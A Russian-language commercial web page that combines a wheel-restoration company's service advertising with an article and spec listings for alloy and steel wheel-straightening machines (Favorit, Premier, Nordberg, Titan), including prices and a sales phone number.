16 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Оборудование для ремонта литых дисков

Ремонт дисков /

Реставрация дисков — главная специализация центров РЛД

Вы повредили свой диск?

Не отчаивайтесь! Практически любой диск можно восстановить.
Это утверждение мы доказываем с 1998 года.

После:

За 21 год нами было отремонтировано более 1 200 000 дисков! Мы обладаем огромной технической базой и большим опытом реставрации дисков, что позволяет нам принять в работу практически любой поврежденный диск.

В центрах РЛД вы можете отремонтировать:

  • литые диски
  • легкосплавные диски
  • кованые диски
  • стальные диски
  • разборные диски
Результат

Восстановление геометрии диска

Возможно устранение радиального, осевого и комбинированного смещения

Устранение трещин и сколов

Полное устранение трещин, сколов царапин (в т.ч. глубоких) и ржавчины

Наращивание отсутствующих частей

Наплавка поврежденного борта, устранение «бордюрной болезни»

Восстановление внешнего вида

Восстановление лакокрасочного покрытия: локально или полностью

Ознакомиться с ценами на реставрацию дисков можно в разделе

Окончательная стоимость ремонта будет рассчитана в одном из наших центров РЛД после диагностики диска нашими специалистами.

Среднее время восстановления геометрии диска составляет от 1 до 2 часов.

Если у вас возникли проблемы с дисками, мы всегда ждем Вас!

Для обращения в центры РЛД запись не требуется.

Возникли вопросы? Позвоните нам и мы ответим на любой интересующий вопрос и найдем решение вашей проблемы!

Вы можете самостоятельно рассчитать ориентировочную стоимость работ по ремонту диска на нашей странице с калькулятором.

Почему выбирают именно нас

Сейчас существует большое количество компаний, которые заявляют, что они могут выполнить любой ремонт. Интернет пестрит объявлениями типа «восстановление колес любой сложности», «новая жизнь ваших колес», «реставрация дисков» или «прокатка дисков». Правда заключается в том, что многие из этих компаний имеют примитивные инструменты для реставрации (кувалда и грелка), а сам ремонт основан на принципе «повезет, не повезет».

Во многих случаях, после обращения в такой «сервис», диски становятся небезопасными для эксплуатации, так как оказываемое давление на диск является непостоянным, а точечный нагрев разрушает саму структуру диска. Кроме того, такая прокатка дисков создает дополнительное напряжение в сплаве диска, что также сказывается на безопасности эксплуатации диска. Так называемая прокатка дисков нарушает молекулярную структуру металла, что влечет за собой ослабление литых и кованых дисков, делая их безопасную эксплуатацию в дальнейшем практически невозможной.

Повторный удар в тоже место прокатанного литого или кованого диска может стать критичным как для диска, так и для авто. Конечно, можно ездить на дисках после их прокатки, но себе это будет «дороже». в плане жизни!

И все же, из всего этого не следует, что ремонт литых дисков вовсе невозможен. Предлагаемый нами метод восстановления геометрии дисков исключает точечный нагрев и прокатку диска роликами, что в значительной степени улучшает качество ремонта, а так же не нарушает структуру металла диска

Группа РЛД использует собственное запатентованное оборудование по ремонту, которое гарантированно сохраняет заводские свойства поврежденного диска. Так как Ваша безопасность является нашим главным приоритетом, мы никогда не возьмемся за ремонт литых дисков, последующая эксплуатация которых будет небезопасна.

Благодаря современному оборудованию и многолетнему опыту работы, ремонт литых дисков от «Группы РЛД» является быстрым, эффективным, надежным и профессиональным.

При ремонте литых дисков наша компания использует только высококачественные расходные материалы и проверенные временем методы ремонта, которые гарантируют качественный результат. Реставрация дисков требует индивидуальный подход, и сочетает в себе комбинацию различных технологии, применение которых зависит от вида повреждения диска.

Ремонт дисков является комплексной процедурой. При обращении в нашу компанию, квалифицированные специалисты на имеющемся у нас современном оборудовании, бесплатно произведут диагностику дефекта Вашего диска. На основании диагностики Вам будет предложен соответствующий ремонт и стоимость данных работ. В ремонт принимаются литые, кованые и стальные (штампованные) диски, всех типов и размеров, в любом состоянии. Восстановление геометрии дисков от «Группы РЛД» гарантирует полное устранение осевого и радиального биения. Кроме этого, возможно восстановление лакокрасочного покрытия диска, узнать о котором можно в разделе ПОКРАСКА ДИСКОВ.

На сегодняшний день, литые диски завоевали высокую популярность среди автолюбителей. Благодаря многообразию выбора литые диски могут улучшить внешний вид автомобиля и выделить его среди остальных. Безусловно литые диски выигрывают по всем статьям у стальных, но качество дорожного покрытия или различные внештатные ситуации могут привести к таким обстоятельствам, когда один или сразу несколько автомобильных дисков могут выйти из строя. Покупка нового диска у дилера может стать дорогой затеей, прибавьте к этому срок ожидания поступления диска, если его нет в наличии. Именно поэтому реставрация дисков является отличным выходом из сложившейся ситуации.

Видеосюжет о ГК РЛД в программе АвтоВести (канал Россия)

Устранение осевого смещения является одним из самых трудоемких процессов при восстановлении геометрии диска. Кроме того, осевое смещение может быть обманчивым. За незначительными повреждениями, которые видно невооруженным взглядом, могут скрываться серьезные нарушения, которые существенно осложнят восстановление геометрии дисков. Выявление таких повреждений возможно только после проверки колеса на специальном стенде.

Следующим этапом осмотра является проверка диска на наличие царапин и трещин. Для их устранения применяется аргоно-дуговая сварка, узнать о которой можно в разделе посвященном СВАРКЕ ДИСКОВ. Данный вид повреждения имеет особое значение для качественного ремонта.

В случае отсутствия фрагмента поврежденного диска, во время ремонта наши специалисты на основе спектрального анализа подбирают соответствующие присадки и в полном объёме восстанавливают диск.

Последней стадией проверки перед началом ремонта является оценка состояния лакокрасочного покрытия.

После полной проверки диска специалисты «Группа РЛД» озвучивают окончательную стоимость восстановления дисков, и после получения согласия клиента диски принимаются в ремонт.

Высококачественный ремонт легкосплавных дисков от «Группы РЛД» обусловлен использованием специального оборудования и строгим соблюдением технологического процесса ремонта, который основан на рекомендациях производителей дисков. Во время восстановления, диск по «холодному» вытягивают на специальном стенде (диск именно вытягивается, а не прокатывается), придавая диску первоначальную форму. Кроме того, при шиномонтаже используется профессиональное оборудование фирмы HOFMANN, благодаря чему нанесение повреждения диску или резине в процессе шиномонтажа исключено. Ознакомится с нашими шиномонтажными услугами можно в разделе ШИНОМОНТАЖ.

Солидная репутация и многолетний опыт работы компании «Группа РЛД» гарантирует безукоризненное выполнение самых сложных и срочных заказов по восстановлению дисков.

Примечание

Реставрация дисков от «Группы РЛД» выполняется без нарушения структуры металла, так как не применяется метод точечного нагрева и прокатки дисков роликами.

Восстановление геометрии дисков осуществляется на уникальном Стенде для правки колесных дисков автомобилей, который был разработан специалистами компании «Группа РЛД», и используется только в наших центрах. Данная разработка подтверждена соответствующим Патентом.

Мы даем гарантию 100% восстановления геометрии диска!

ПРИМЕРЫ РЕМОНТА ДИСКОВ

Локальное устранение сколов и царапин диска

Ремонт диска с восстановлением отсутствующей части диска

Ремонт диска с глубокими задирами, включая полировку и подкраску

Устранение загиба (радиального смещения геометрии) диска

СТОИМОСТЬ РЕМОНТА ДИСКОВ

В таблице указана стоимость ремонтных работ для 1 диска. Шиномонтаж, аргонно-дуговая сварка и покраска дисков оплачивается отдельно. Окончательная стоимость ремонта диска определяется после бесплатной диагностики диска в одном из центров РЛД.

Станки для правки дисков

Стенд для правки дисков «Фаворит» предназначен для правки литых и кованых легкосплавных дисков диаметром от 10 до 22 дюймов включительно (до 22-х дюймов — используя мобильный кронштейн).

Стенд для правки дисков «Фаворит-П» предназначен для правки литых и кованых легкосплавных дисков от 10 до 24 дюймов включительно (до 24х дюймов — используя мобильный кронштейн). Добавлен электрический привод вращения шпинделя, предназначенный для облегчения поиска зоны правки диска, что, безусловно, повышает производительность труда и качество работ.

Стенд «Фаворит-Т» с токарным модулем предназначен для правки литых и кованых дисков, диаметром от 10 до 24 дюймов включительно (до 24х дюймов — используя мобильный кронштейн).

Стенд Лидер предназначен для ремонта мотоциклетных дисков и предназначено для восстановления геометрии таких дисков диаметром до 19 дюймов.

Стенд для правки дисков «Премьер» способен восстанавливать посадочную полку и бортовую закраину штампованных колес легковых отечественных автомобилей (например, «ВОЛГА», «НИВА»), автомобилей семейства «ГАЗЕЛЬ», а также импортных автомобилей диаметром до 16 дюймов!

Стенд для правки дисков «Премьер-M» предназначен для правки бортовых закраин и посадочной полки штампованных дисков диаметром от 13 до 16 дюймов включительно легковых отечественных автомобилей («ВОЛГА», «НИВА», «СОБОЛЬ», «ГАЗЕЛЬ»), а также импортных автомобилей.

Станок для правки и восстановления колесных дисков, диаметр 13″ — 24″.

Без блока проточки.

Станок для правки и восстановления колесных дисков, диаметр 13″ — 24″.

С блоком проточки.

Стенд «Премьер-Альфа» предназначен для исправления дефектов геометрии литых и кованых дисков легковых автомобилей с посадочным диаметром от 10 до 24 дюймов, а также восстановления полки и бортовых закраин штампованых дисков легковых автомобилей с посадочным диаметром от 13 до 16 дюймов, включая диски автомобилей семейства «Газель».

Модель Премьер-Альфа-Т отличается от модели Премьер-Альфа наличием токарного модуля для проточки наплывов от сварки и других дефектов диска.

Модель Премьер-Альфа-ТР отличается от модели Премьер-Альфа-Т наличием регуляторв оборотов вала при токарной обработке диска. Число оборотов регулируется от 40 до 480 об/мин, что расширяет возможности токарной обработки дисков из разных сплавов и разных размеров.

Стенд для правки дисков Премьер-Мини предназначен для восстановления посадочной полки и бортовой закраины стальных штампованных дисков диаметром от 13 до 16 дюймов включительно легковых автомобилей и автомобилей семейства «Газель».

Стенд предназначен для реставрации деформированных закраин и полок ободьев колёс легковых автомобилей.

Комплект приспособлений предназначен для реставрации наиболее распространённых деформаций литых и штампованных дисков на шиномонтажном станке.

Стенд предназначен для правки любых повреждений лекгосплавных литых и кованых дисков диаметром до 26”.

Стенд предназначен для реставрации деформированных закраин и полок ободьев колёс легковых автомобилей.

Cтанок для правки литых дисков NORDBERG ECO 21LR с ручной гидравликой без токарной группы. Предназначен для рихтовки дисков с помощью гидроцилиндра.
Гидроцилиндр можно установить практически с любой стороны поврежденного диска и произвести силовое выдавливание.

Универсальный станок для правки дисков с электрогидравликой 2-х-скоростной.
Дископравильный станок Nordberg 22SLE применяется для правки дисков автомобильных колёс с помощью, как прокаточных роликов, так и с помощью электрогидравликой. При этом он также наделён возможностью устанавливать резец для последующей проточки (обработки) рихтуемых поверхностей.

Универсальный станок для правки дисков с пневмогидравликой.

Универсальный станок для правки дисков с пневмогидравликой 2х-скоростной.
Дископравный станок Nordberg ECO 22SLR применяется для правки дисков автомобильных колёс с помощью, как прокаточных роликов, так и с помощью ручной гидравлики усилием в 10т. При этом он также наделён возможностью устанавливать резец для последующей проточки (обработки) рихтуемых поверхностей.

Станок для правки литых дисков: назначение, использование

От ям и ухабов на асфальте не застрахован даже самый аккуратный водитель. Небольшая яма глубиной чуть более 10 см может нанести ощутимый вред колёсным дискам. Любой специалист скажет, что нарушение геометрии колеса приводит к искривлению рулевой тяги, системы управления и подвески.

Назначение оборудования для правки дисков

В процессе ремонта и правки изогнутому диску возвращают правильную, первоначальную форму. В зависимости от материала процесс выравнивания можно провести в гараже своими руками. С помощью кувалды специалисты успешно реставрируют штампованные стальные диски. Существующие заметные дефекты удаляются, а поверхность шлифуется. В таком случае не существует гарантии, что вы воссоздали первоначальную геометрию колеса. Скупиться не следует: доверьте рихтовку профессионалам, они выполнят реставрацию качественно и быстро.

Более сложной является реставрация алюминиевых литых дисков. Негативной особенностью сплава является нагревание, при котором качество металла полностью теряется. Грамотный ремонт необходимо проводить исключительно способом холодной прокатки, используя точечный нагрев для сильно повреждённых элементов диска. Провести процедуру возможно только на специальном станке для холодной прокатки. Станок имеет гидравлический привод и комплект насадок для правки.

Виды дископравных станков

Выбрать диск на современный автомобиль — задача не из простых. Диски производят из различных сплавов и материалов, а также они имеют различные конструкции и узоры. Поэтому подобрать дископравный станок нужно с умом. Существуют такие виды ископаемых станков:

  • Для правки дисков из стальных сплавов;
  • Для правки легкосплавных дисков;
  • Для дисков из цветных металлов;
  • Для ремонта «восьмёрки»;
  • Стенды для ремонта дисков грузовиков.

По принципу действия станки делятся на механические и гидравлические. Механические, в свою очередь, используются для устранения таких повреждений:

  • Биения по радиусу и оси;
  • Эллиптичность;
  • Неглубокие вмятины;
  • Правка места для посадки резины.

Использование разных видов станков

На гидравлическом стенде мастер способен реставрировать практически любую вмятину или дефект. Бывают случаи, когда приходится использовать гидравлическое и механическое оборудование.

Для стальных дисков

В процессе правки стальных дисков повреждённая часть прокатывается сквозь прижимные ролики. Диск надевается на вал, и на искореженные места воздействуют ролики под необходимым углом для выравнивания.

Универсальный фланец закрепляется на наконечнике вала, после одевается колесо и крепится с помощью гайки. Если колесо имеет несколько отверстий, то на фланец требуется надеть каждое отверстие. Крепёжные проёмы, имеющие деформацию, центрируются с использованием конических гаек. Электромотор размещён в нижней части станины, соединён с редуктором и клиноременной передачей. Натяжение клиноременной передачи также контролируется гайкой. На таком стенде можно проводить прокатку деформированных колёс с размерами от 10 до 15 дюймов.

Для легкосплавных дисков

Сейчас легкосплавные диски пользуются огромной популярностью как среди молодёжи, так и среди машин S-класса. Такие диски смотрятся очень эффектно, они легки и прочны. Они могут быть коварными и литыми.

Литые реставрируются очень просто: давление с помощью гидроусилителя подаётся на повреждённый участок. Кованые обода имеют лучшие характеристики, нежели литые. Существует большое количество методов ремонта кованых ободов с использованием насадок, через которые давление подаётся на деталь.

Самостоятельно повреждённый обод устанавливают на планшайбу. Рабочая поверхность, в свою очередь, оборудована пазами, предназначенными для крепления любой разновидности ободов. Среднее усилие, необходимое для восстановления формы, колеблется от 3 до 3−5 тонн. Такое давление создаётся с помощью гидравлического привода, который, в свою очередь, управляется гидравлическим распределителем с функцией настройки давления и клапаном редукции.

Рабочая жидкость (техническое масло) выталкивает цилиндр под давлением. Давление обеспечивает насос, который находится около двигателя в нижней части станка. Эффективность прокатки напрямую зависит от работоспособности насоса. С электродвигателем насос сообщается посредством муфты. На обратной стороне находится указатель биения — направляющая из металла с заострённым концом. Указатель биения служит для непосредственного выбора точки рихтовки и является важным фактором на завершающем этапе реставрации.

Станок для правки «литья» укомплектован рабочими насадками и штоками для более гладкой рихтовки. Устройство станка предусматривает ящичек для хранения инструментов и запчастей. Реже встречаются модели гидравлических аппаратов с ручным насосом, однако, они менее производительны.

Для правки восьмёрки

Гидравлическое оборудование для правки «восьмёрки» поможет исправить радиальную деформацию обода. При использовании такого оборудования диск укладывается на горизонтальную станину и прижимается выравнивающим гидравлическим прессом.

Универсальные дископравы

Универсальная станина для ремонта — это комбинированный подход к реставрации с использованием гидравлики и механики. Такие аппараты работают с диаметрами от 10 до 25 дюймов. Устраняют радиальное и осевое биение, восстанавливают место посадки резины и исправляют эллипсность. Ремонт такими аппаратами производится двумя способами:

  1. Двухсторонняя прокатка внутренней и внешней поверхности стационарными и мобильными роликами.
  2. Рихтовка с помощью гидроцилиндра. Управления в этом случае осуществляется гидрораспределителем.

Мощность таких станков 380 вольт, они оснащены трехфазным электромотором. Универсальные станки оснащены резцом для очистки напая после сварочных работ. Встречаются разновидности станков с ножницами для подрезки кромки.

Обзор и сравнение станков

Предположим, вы владелец шиномонтажа и решили ввести в ассортимент своих услуг правку литых дисков. Решение правильное, которое поможет вам заработать в межсезонье. Большинство автолюбителей производит правку и рихтовку колёс вовремя переобувки. Так что ремонт дисков — неплохой заработок в любое время года. Сразу стоит заметить: если при укомплектовке участка шиномонтажа вы можете сэкономить, то при покупке дископравильного оборудования, а также аргонного аппарата экономить не следует. Купить нужно всё по списку: не меньше, не больше.

Итак, вам нужен такой дископрав:

  • Радиусная установка диска до 24 дюймов;
  • Аппарат с двусторонним цилиндром гидравлического действия;
  • Гидростанция на 380 вольт;
  • Аппарат оснащён электрическим вращением шпинделя.

Может так случиться, что в вашем городе даже нет машин, на которых используются колеса радиусом 22 дюйма. И такого клиента у вас никогда не будет. Помните, что большая рама существенно облегчит работу с колёсами и дисками любого радиуса. А также не забывайте, что если услуга окажется невостребованной, то продать станок R24 проще.

Вы должны понимать, что такое двухсторонний гидроцилиндр. Если шток гидроцилиндра двигается автоматически в обе стороны и оснащён ручкой управления ядра переключателя — то это двухсторонний цилиндр. Существуют станки с односторонним гидроцилиндром. При использовании такого аппарата вам придется рукой накачивать винт клапана, чтобы закрепить детали на станине.

Цена дископравильного оборудования необоснованно высока, поэтому нужно правильно выбрать подходящий образец. Гидроприводы существуют на 380 вольт и на 220. Электродвигатель с мощностью 220v маломощный и вряд ли справится с задачей прокатки серьёзного деформирования. Бывают случаи, когда электропитание цеха не позволяет приобрести станок мощность 380 вольт, тогда придется приобрести маломощный аппарат.

Под электрическими вращением шпинделя мы понимаем вращение осевого крепления диска на универсальных стапелях с роликовой прокладкой или токарной группой. Ручное вращение замедлит работу в несколько десятков раз.

Дископравы на нашем рынке

  • Фаворит или Junior. Похожие друг на друга, малофункциональные, недорогие станки. Справляются с лёгкими деформациями. Мощность таких станков 220 вольт, и они прекрасно подходят для начального уровня реставрации. Когда трафик клиентов увеличится, вы сами поймёте, что пора менять станок на более серьёзный. Цена агрегата 75−95 т. р.
  • Фаворит-П. Станок для правки литых дисков оснащён мобильный токарный группой, вращение рабочего шпинделя происходит с помощью электродвигателя. Недостатком является наличие кнопки пуска, которую нужно удерживать постоянно, что совсем неудобно в работе. Аппарат подойдёт для правки небольших повреждений и сколов. Специалисты говорят что недостатков у станка больше, чем требуется: неустойчивый стол маленького размера, неудобная кнопка пуска, плохо продуманный гидропереключатель. Единственным плюсом является цена агрегата, которая колеблется от 50 до 60 т. р.
  • Титан 5700 и KÖNIG 24″. Многие автомастера и специалисты рекомендуют только этот станок. Титан 5700 — хорошо зарекомендовавший и ходовой аппарат. По данным интернет-магазинов, является самой популярной моделью. При низкой цене имеют сложную токарную группу, хорошо налаженные правочные упоры и редукторный привод вращение шпинделя. Многие автолюбители жалуются на сильное перегревание диска. Для исправления этой проблемы используют токарную группу для обточки внутренней полки. Шпиндель вращается с помощью редуктора и имеет несколько направлений смещения. Цена такого станка от 70 до 80 т. р.
  • Титан 5800 Konig 15T00/56T 00. Станок полностью походит на Титан 5700, однако, не оснащён электрическим вращением вала и токарной группой. Хорошо подойдёт для самостоятельной доработки. В интернете можно найти множество видеороликов по апгрейду такого аппарата. Если у вас есть возможность выточить шкив и установить на него электродвигатель, вы сэкономите хорошую сумму. При покупке такого станка будьте внимательны, т. к. есть праворукие и леворукие стенды. В России также продаются копии моделей (ALU-22). Качество и цена попроще.
  • KraftWell KRWRРL 24. Хорошо зарекомендовавший себя дископравный станок, производимый в Турции. Сейчас существует множество китайских подделок. Фирменные «крафтвелловские» агрегаты оснащены ремённым приводом вращения шпинделя. Скорость вращения более 200 оборотов в минуту. В отличие от редукторных станков, этот вид намного проще и устраивает многих частных автомастеров по цене. В свободной продаже не встречаются, найти можно в интернете под заказ.

Дископравных стендов сейчас огромное количество. Их «лепят» все, кому не лень, поэтому встречаются некачественные и плохо отлаженные аппараты. Качество реставрации для аппарата напрямую зависит от комплектации. Для начала можно приобрести несложный станок по цене от 70 тыс. руб. При увеличении трафика клиентов можно приобрести более современный станок, цена которого 170−380 тыс. руб. Всё зависит от «крутизны» и пафоса вашего сервиса.

Многие автосервисы имеют по несколько станков, главное, выбрать работоспособные модели с регулируемым управлением гидроцилиндров. На таком станке вы сможете отреставрировать обод любой иномарки. Вместе со станком приобретите гидравлическое масло.

Цена на заграничные станки завышена вдвое, отечественное оборудование для шиномонтажа не дешевле и к тому же вряд ли качественнее. По этой причине на большинстве автосервисов присутствуют устаревшее аппараты. Вот и приходится находить опытного специалиста по реставрации литых дисков или обучать ремеслу нового мастера.

Важно помнить, что без специального обучения и опыта работать на дисковом оборудовании строго запрещено. При неправильной реставрации или сварке колёса могут просто разрушиться, не говоря уже об угрозе здоровью при неправильной эксплуатации.

Станки для правки дисков

Универсальный станок для правки дисков с электрогидравликой 2-х-скоростной Nordberg 22SLE применяется для правки дисков автомобильных колёс с помощью, как прокаточных роликов, так и с помощью электрогидравликой. При этом он также наделён возможностью устанавливать резец для последующей проточки (обработки) рихтуемых поверхностей.

  • Тип станка универсальный.
  • Назначение для стальных и литых дисков.
  • Диаметр обслуживаемых дисков 12-22 дюйма.
  • Ширина обслуживаемых дисков/колес 4-10 дюйма.
  • Толщина обода диска 3 мм, регулировка до 8 мм.
  • Частота вращения вала 18 — 22 об/мин и 250 — 300 об/мин.
  • Мощность электродвигателя 2,2-3 кВт.
  • Электропитание 220В/380 В(по запросу) Производитель: Nordberg (Китай)

    Станок для правки литых дисков NORDBERG ECO 21LR с ручной гидравликой без токарной группы. Предназначен для рихтовки дисков с помощью гидроцилиндра.Гидроцилиндр можно установить практически с любой стороны поврежденного диска и произвести силовое выдавливание.

  • Предназначен для правки литых дисков.
  • Токарной группы нет.
  • Диаметр обслуживаемых дисков 12 — 22 дюйм
  • Ширина обслуживаемых дисков/колес 4,0 — 10,0 дюймов
  • Толщина обода диска 2 — 11 мм
  • Электропитание 3фх380 В Производитель: Nordberg (Китай)

    Станок для правки литых дисков NORDBERG 21LL с пневматической гидравликой без токарной группы. Предназначен для рихтовки дисков с помощью гидроцилиндра.

  • Предназначен для правки литых дисков.
  • Токарной группы нет.
  • Диаметр обслуживаемых дисков 12 — 22 дюйм
  • Ширина обслуживаемых дисков/колес 4,0 — 10,0 дюймов
  • Толщина обода диска 2 — 11 мм
  • Электропитание 3фх380 В Производитель: Nordberg (Китай)

    Станок для правки литых дисков NORDBERG 21LL с пневматической гидравликой с токарной группой. Предназначен для рихтовки дисков с помощью гидроцилиндра

  • Предназначен для правки литых дисков.
  • Токарная группа присутствует.
  • Диаметр обслуживаемых дисков 12 — 22 дюйм
  • Ширина обслуживаемых дисков/колес 4,0 — 10,0 дюймов
  • Толщина обода диска 2 — 11 мм
  • Электропитание 3фх380 В Производитель: Nordberg (Китай)

    Станок для правки литых дисков NORDBERG 21LE с электрической гидравликой без токарной группы (электропривод вала). Предназначен для рихтовки дисков с помощью гидроцилиндра.

  • Предназначен для правки литых дисков.
  • Токарной группы нет.
  • Диаметр обслуживаемых дисков 12 — 22 дюйм
  • Ширина обслуживаемых дисков/колес 4,0 — 10,0 дюймов
  • Толщина обода диска 2 — 11 мм
  • Электропитание 3фх380 В Производитель: Nordberg (Китай)

    Универсальный станок для правки дисков с пневмогидравликой Nordberg ECO 21SL применяется для правки дисков автомобильных колёс с помощью, как прокаточных роликов, так и с помощью пневмогидравлики. При этом он также наделён возможностью устанавливать резец для последующей проточки (обработки) рихтуемых поверхностей.

  • Тип станка универсальный.
  • Назначение для стальных и литых дисков.
  • Диаметр обслуживаемых дисков 12-21 дюйма.
  • Ширина обслуживаемых дисков/колес 4-10 дюйма.
  • Толщина обода диска 3 мм, регулировка до 8 мм.
  • Частота вращения вала 15 — 18 об/минуту.
  • Мощность электродвигателя 1.5 кВт.
  • Электропитание 220В/380 В(по запросу) Производитель: Nordberg (Китай)

    Станок для правки дисков используется для восстановления автомобильных дисков, по тем или иным причинам потерявшим свою изначальную геометрию. Бордюры, ямы на дорогах, лежачие полицейские, ДТП – условий для деформации дисков в России, а потому и услуга восстановления пользуется стабильным спросом.

    Оборудование для ремонта можно разделить на 2 вида:

    • Станки для правки литых дисков
    • Станки для правки дисков (к ним относятся и стальные, и легкосплавные штампованные)

    При этом станки для стальных дисков также делятся на 2 вида:

    • Для правки закраин и полок обода
    • Для правки дисков от “восьмерок”

    По назначению дископравы также разделяют на:

    • Станки для прокатки
    • Стенды для рихтовки
    • Универсальные дископравильные стенды

    Как видно из названия, универсальные стенды способны заменить оба вышестоящих, то есть являются более выгодным приобретением для бизнеса.

    Если вы испытываете затруднения с выбором дископравов, обратитесь к нашим консультантам. Они подберут для вас лучшую модель станка и расскажет обо всех ее особенностях.

    Оборудование для ремонта литых дисков

    ► Купить со СКИДКой станок для правки дисков, стенд для правки дисков ► Низкая цена+Кредит+Рассрочка ► ДОСТАВКА по всей России (Быстро и Надежно).

    Станки для правки дисков могут делать:

    • Серия «Фаворит» только легкосплавные (литые и кованые) диски
    • Серия «Премьер» только штампованные диски
    • Серия «Премьер-Альфа» делает и легкосплавные, и штампованные диски

    • Напряжение питания 220 В или 380 В
    • Потребляемая мощность 0,75 или 1,5 кВт
    • Размер ремонтируемых дисков (посадочный диаметр) 10-24 дюйм
    • Рабочий ход штока гидроцилиндра 30 мм
    • Расчетная производительность 4 дисков/час
    • Габаритный размеры 885х610х1190 (1365) мм
    • Вес 190 кг (220В) или 195 кг (380В)
    • Размеры в упаковке 700x1100x1375 мм
    • Вес в упаковке 220 кг (220В) или 225 кг (380В)
    • Размер ремонтируемых дисков (посадочный диаметр) 10-24 дюйм

    • Напряжение питания 220 В или 380 В
    • Потребляемая мощность 0,75 или 1,5 кВт
    • Размер ремонтируемых дисков (посадочный диаметр) 10-24 дюйм
    • Рабочий ход штока гидроцилиндра 30 мм
    • Расчетная производительность 4 дисков/час
    • Габаритный размеры 885х610х1190 (1365) мм
    • Вес 231 кг
    • Размеры в упаковке 700x1100x1375 мм
    • Вес в упаковке 220 кг (220В) или 225 кг (380В)
    • Размер ремонтируемых дисков (посадочный диаметр) 10-24 дюйм

    • Размер обрабатываемых колес, ширина обода 3,5. 11 дюймов
    • Максимальная толщина материала в месте исправления 4 мм
    • Максимальный крутящий момент на фланце крепления диска 790 Hм
    • Напряжение питания 380 В
    • Потребляемая мощность 1,1 кВт
    • Расчетная производительность 6 дисков/час
    • Габариты 1180х870х1080 мм
    • Вес 300 кг
    • Размеры в упаковке 950x1300x1325 мм
    • Вес в упаковке 375 кг

    • Наличие токарного модуля
    • Мощность привода токарного модуля 1,1 кВт
    • Кнопка кратковременного включения привода
    • Гидравлический привод с максимальным усилием 5300 кг
    • Мощность привода гидростанции 600 Вт
    • Напряжение питания 380 В
    • Размер ремонтируемых дисков (посадочный диаметр) 10-24 дюйм
    • Расчетная производительность 4 дисков/час
    • Габаритный размеры 890х885х1270(1420) мм
    • Вес 265 кг
    • Размеры в упаковке 700x1100x1375 мм
    • Вес в упаковке 300 кг

    • Напряжение питания 380 В
    • Потребляемая мощность 1,65 кВт
    • Габаритный размеры (ДхШхВ) 1450х1100х1450 мм
    • Вес 450 кг
    • Размер ремонтируемых дисков (посадочный диаметр) от 10 до 24 дюймов для литых дисков
    • Размер ремонтируемых дисков (посадочный диаметр) от 13 до 16 дюймов включительно для стальных дисков
    • Размер ремонтируемых дисков (ширина обода) от 3,5 до 14 для литых дисков
    • Размер ремонтируемых дисков (ширина обода) от 3,5 до 11 для штампованных дисков
    • Максимальная толщина диска в месте исправления 3 мм
    • Рабочий ход штока гидроцилиндра 30 мм
    • Размеры в упаковке ДхШхВ 1500х1150х1500 мм
    • Вес в упаковке 520 кг

    • Напряжение питания 380 В
    • Потребляемая мощность 2,6 кВт
    • Габаритный размеры (ДхШхВ) 1100х1466х1472 мм
    • Вес 480 кг
    • Размер ремонтируемых дисков (посадочный диаметр) от 10 до 24 дюймов для литых дисков
    • Размер ремонтируемых дисков (посадочный диаметр) от 13 до 16 дюймов включительно для стальных дисков
    • Размер ремонтируемых дисков (ширина обода) от 3,5 до 14 дюймов для литых дисков
    • Размер ремонтируемых дисков (ширина обода) от 3,5 до 11 дюймов для штампованных дисков
    • Максимальная толщина диска в месте исправления 3 мм для штампованных дисков
    • Рабочий ход штока гидроцилиндра 30 мм
    • Размеры в упаковке ДхШхВ 1500х1150х1500 мм
    • Вес в упаковке 520 кг

    • Напряжение питания 3 фазы, 380±10%В
    • Потребляемая мощность 1100 Вт
    • Размер ремонтируемых дисков (посадочный диаметр) 10-22 дюйм
    • Рабочий ход штока гидроцилиндра 30 мм
    • Расчетная производительность 4 дисков/час
    • Габаритный размеры 890х610х1270(1420) мм
    • Вес 220 кг
    • Размеры в упаковке 700x1100x1375 мм
    • Вес в упаковке 250 кг

    • Напряжение питания 380 В
    • Потребляемая мощность 2,6 кВт
    • Габаритный размеры (ДхШхВ) 1100х1466х1472 мм
    • Вес 480 кг
    • Размер ремонтируемых дисков (ширина обода) от 3.5 до 14 дюймов для литых дисков
    • Размер ремонтируемых дисков (ширина обода) от 3.5 до 11 дюймов для штампованных дисков
    • Размер ремонтируемых дисков (посадочный диаметр) от 10 до 24 дюймов для литых дисков
    • Размер ремонтируемых дисков (посадочный диаметр) от 13 до 16 дюймов для штампованных дисков
    • Максимальная толщина диска в месте исправления 3 мм для штампованных дисков
    • Рабочий ход штока гидроцилиндра 30 мм
    • Размеры в упаковке ДхШхВ 1500х1150х1500 мм
    • Вес в упаковке 520 кг

    • Напряжение питания 380 В
    • Потребляемая мощность 2,1 кВт
    • Габаритный размеры (ДхШхВ) 1100х1466х1472 мм
    • Вес 480 кг
    • Размер ремонтируемых дисков (посадочный диаметр) от 10 до 24 дюймов для литых дисков
    • Размер ремонтируемых дисков (посадочный диаметр) от 13 до 17 дюймов для штампованных дисков
    • Толщина материала обрабатываемых дисков Легкосплавных и кованных – 4 мм не менее Стальных – 3 мм не более
    • Рабочий ход штока гидроцилиндра 30 мм
    • Размеры в упаковке ДхШхВ 1500х1150х1500 мм
    • Вес в упаковке 520 кг

    • Напряжение питания 220 или 380 В
    • Потребляемая мощность 0,75 кВт
    • Габаритный размеры (ДхШхВ) 620х820х1270 мм
    • Вес 173 кг
    • Рабочий ход штока гидроцилиндра 72 мм
    • Размеры в упаковке ДхШхВ 750х1010х1480 мм
    • Вес в упаковке 206 кг

    Дополнительная опция для стендов для правки дисков.

    Дополнительная опция для стендов для правки дисков.

    Стенд для реставрации автомобильных колес с деформацией типа «восьмерка». Область применения стенда: колеса шириной 4…6 дюймов и диаметром 13. 16 дюймов. Кроме того «стенд» может использоваться в качестве гидравлического пресса.

    • Габариты 630/590/1300 мм
    • Вес 100 кг

    Принцип работы: диск закрепляют на валу станка, а затем воздействуют на его деформированные части с помощью различных насадок, устанавливаемых на шток силового гидроцилиндра. При этом можно воздействовать практически на любую точку диска и в любом направлении с дозированным усилием. Дископрав.

    • Интервал применения 10″-18″
    • Рабочее давление 160-170 бар
    • Максимальная сила давления 5000 кг
    • Скорость вращения шпинделя 260 об/мин
    • Гидравлический электродвигатель 0,75 кВт — 900 об/мин
    • Электродвигатель токарного станка 0,75 кВт — 1400 об/мин
    • Габариты 1300/900/1370 мм
    • Вес 360 кг

    Для покупки оборудования звоните: 8-800-333-37-21 (по РФ бесплатно) или отправьте заявку и мы перезвоним Вам в течение 5 минут с 7-00 до 23-00.

